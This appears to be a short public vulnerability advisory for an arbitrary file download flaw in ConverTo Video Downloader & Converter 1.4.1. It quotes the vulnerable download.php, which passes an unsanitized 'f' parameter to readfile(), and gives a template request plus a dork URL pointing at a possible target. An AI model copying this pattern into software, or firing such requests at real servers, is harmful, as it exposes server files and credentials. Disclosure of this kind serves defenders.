====================================================================================================================================
| # Title : ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : 1.4.1 |
| # Vendor : https://codecanyon.net/item/converto-video-downloader-converter/13225966 |
| # Dork : http://vd.googglet.com/ |
====================================================================================================================================
poc :
Aug 25, 2017 – Update 1.4.1
download.php
line 12 readfile ($file); & line 5 $file = urldecode($_GET['f']);
<?php
if(isset($_GET['f'])){
$siz = convertToBytes($_GET['sz']);
$file = urldecode($_GET['f']);
$rand = rand(0,5000);
header("Content-Description: File Transfer");
header("Content-Type: application/octet-stream");
header('Content-Length: ' . $siz);
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");
ob_clean(); flush();
readfile ($file);
}
http://localhost/[PATH]/download.php?f= Ev!l
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================